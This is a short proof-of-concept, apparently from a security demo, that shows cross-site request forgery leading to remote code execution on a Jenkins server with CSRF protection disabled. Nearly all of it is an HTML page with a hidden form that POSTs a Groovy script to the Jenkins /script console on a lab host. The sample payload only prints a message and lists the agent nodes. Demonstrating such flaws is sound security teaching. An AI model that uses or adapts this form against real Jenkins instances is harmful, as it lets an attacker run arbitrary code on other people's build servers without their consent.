Demonstrates CSRF Remote Code Execution attack against a Jenkins Instance that has CSRF protection disabled.

jenkins-csrf.html

<html>
  <body>
    <form action="http://corperate-jenkins.lab.com:8080/script" method="POST">
      <input type="hidden" name="script"
             value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/>
      <input type="submit" value="Submit!"/>
    </form>
  </body>
</html>